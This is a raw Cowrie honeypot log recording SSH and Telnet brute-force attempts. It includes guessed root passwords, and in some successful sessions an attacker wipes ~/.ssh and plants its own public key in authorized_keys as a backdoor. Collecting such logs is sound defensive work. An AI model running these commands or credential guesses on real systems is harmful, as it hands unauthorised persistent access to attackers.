{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:14:13.303336Z","src_ip":"212.227.235.229","session":"fe1e788324af"}
{"eventid":"cowrie.login.failed","username":"minerstat","password":"Password1","message":"login attempt [minerstat/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T02:14:14.318649Z","src_ip":"212.227.235.229","session":"fe1e788324af"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:14:15.577149Z","src_ip":"212.227.235.229","session":"fe1e788324af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49720,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3563e5609f6","protocol":"ssh","message":"New connection: 212.227.235.229:49720 (1.2.3.4:22) [session: c3563e5609f6]","sensor":"my-vps","timestamp":"2025-09-09T02:14:15.889167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:14:15.892864Z","src_ip":"212.227.235.229","session":"c3563e5609f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:14:17.113648Z","src_ip":"212.227.235.229","session":"c3563e5609f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34258,"dst_ip":"1.2.3.4","dst_port":22,"session":"64ea2bc4d334","protocol":"ssh","message":"New connection: 212.227.235.229:34258 (1.2.3.4:22) [session: 64ea2bc4d334]","sensor":"my-vps","timestamp":"2025-09-09T02:14:19.685803Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:14:19.687705Z","src_ip":"212.227.235.229","session":"64ea2bc4d334"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:14:19.949002Z","src_ip":"212.227.235.229","session":"64ea2bc4d334"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"P@ssw0rd","message":"login attempt [elastic/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T02:14:20.995353Z","src_ip":"212.227.235.229","session":"64ea2bc4d334"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:14:22.261321Z","src_ip":"212.227.235.229","session":"64ea2bc4d334"}
{"eventid":"cowrie.session.closed","duration":12.786627054214478,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:14:23.549604Z","src_ip":"212.227.125.160","session":"caeb2a34323c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42646,"dst_ip":"1.2.3.4","dst_port":23,"session":"8cd6b7d1f630","protocol":"telnet","message":"New connection: 212.227.125.160:42646 (1.2.3.4:23) [session: 8cd6b7d1f630]","sensor":"my-vps","timestamp":"2025-09-09T02:14:23.763808Z"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:14:25.328420Z","src_ip":"212.227.235.229","session":"c3563e5609f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34496,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e6764b035e3","protocol":"ssh","message":"New connection: 212.227.235.229:34496 (1.2.3.4:22) [session: 6e6764b035e3]","sensor":"my-vps","timestamp":"2025-09-09T02:14:34.550338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:14:34.552987Z","src_ip":"212.227.235.229","session":"6e6764b035e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:14:34.930173Z","src_ip":"212.227.235.229","session":"6e6764b035e3"}
{"eventid":"cowrie.login.success","username":"root","password":"1234@Abcd","message":"login attempt [root/1234@Abcd] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:14:36.442046Z","src_ip":"212.227.235.229","session":"6e6764b035e3"}
{"eventid":"cowrie.session.closed","duration":12.773542642593384,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:14:36.537285Z","src_ip":"212.227.125.160","session":"8cd6b7d1f630"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42948,"dst_ip":"1.2.3.4","dst_port":23,"session":"69cf123c2f90","protocol":"telnet","message":"New connection: 212.227.125.160:42948 (1.2.3.4:23) [session: 69cf123c2f90]","sensor":"my-vps","timestamp":"2025-09-09T02:14:36.748258Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:14:37.269525Z","src_ip":"212.227.235.229","session":"6e6764b035e3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:14:37.270334Z","src_ip":"212.227.235.229","session":"6e6764b035e3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:14:37.271306Z","src_ip":"212.227.235.229","session":"6e6764b035e3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:14:37.649705Z","src_ip":"212.227.235.229","session":"6e6764b035e3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:14:38.470769Z","src_ip":"212.227.235.229","session":"6e6764b035e3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:14:38.471485Z","src_ip":"212.227.235.229","session":"6e6764b035e3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:14:38.856319Z","src_ip":"212.227.235.229","session":"6e6764b035e3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:14:38.857193Z","src_ip":"212.227.235.229","session":"6e6764b035e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36356,"dst_ip":"1.2.3.4","dst_port":22,"session":"d05e3afc595b","protocol":"ssh","message":"New connection: 212.227.235.229:36356 (1.2.3.4:22) [session: d05e3afc595b]","sensor":"my-vps","timestamp":"2025-09-09T02:14:39.253597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:14:39.258062Z","src_ip":"212.227.235.229","session":"d05e3afc595b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:14:39.644255Z","src_ip":"212.227.235.229","session":"d05e3afc595b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:14:41.199755Z","src_ip":"212.227.235.229","session":"d05e3afc595b"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:14:42.595864Z","src_ip":"212.227.235.229","session":"d05e3afc595b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37912,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc7dadb16a99","protocol":"ssh","message":"New connection: 212.227.235.229:37912 (1.2.3.4:22) [session: dc7dadb16a99]","sensor":"my-vps","timestamp":"2025-09-09T02:14:42.954985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:14:42.958157Z","src_ip":"212.227.235.229","session":"dc7dadb16a99"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:14:43.337759Z","src_ip":"212.227.235.229","session":"dc7dadb16a99"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:14:44.827686Z","src_ip":"212.227.235.229","session":"dc7dadb16a99"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:14:45.205538Z","src_ip":"212.227.235.229","session":"dc7dadb16a99"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:14:45.206380Z","src_ip":"212.227.235.229","session":"6e6764b035e3"}
{"eventid":"cowrie.session.closed","duration":12.813004493713379,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:14:49.561196Z","src_ip":"212.227.125.160","session":"69cf123c2f90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43249,"dst_ip":"1.2.3.4","dst_port":23,"session":"9c396a109703","protocol":"telnet","message":"New connection: 212.227.125.160:43249 (1.2.3.4:23) [session: 9c396a109703]","sensor":"my-vps","timestamp":"2025-09-09T02:14:49.769694Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42192,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e5f047894c9","protocol":"ssh","message":"New connection: 212.227.235.229:42192 (1.2.3.4:22) [session: 4e5f047894c9]","sensor":"my-vps","timestamp":"2025-09-09T02:14:56.734356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:14:56.735430Z","src_ip":"212.227.235.229","session":"4e5f047894c9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:14:56.823603Z","src_ip":"212.227.235.229","session":"4e5f047894c9"}
{"eventid":"cowrie.login.success","username":"root","password":"1QAZ2wsx3edc4rfv","message":"login attempt [root/1QAZ2wsx3edc4rfv] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:14:57.214874Z","src_ip":"212.227.235.229","session":"4e5f047894c9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:14:57.409489Z","src_ip":"212.227.235.229","session":"4e5f047894c9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:14:57.410385Z","src_ip":"212.227.235.229","session":"4e5f047894c9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:14:57.411618Z","src_ip":"212.227.235.229","session":"4e5f047894c9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:14:57.500776Z","src_ip":"212.227.235.229","session":"4e5f047894c9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:14:57.789318Z","src_ip":"212.227.235.229","session":"4e5f047894c9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:14:57.789984Z","src_ip":"212.227.235.229","session":"4e5f047894c9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:14:57.879437Z","src_ip":"212.227.235.229","session":"4e5f047894c9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:14:57.880432Z","src_ip":"212.227.235.229","session":"4e5f047894c9"}
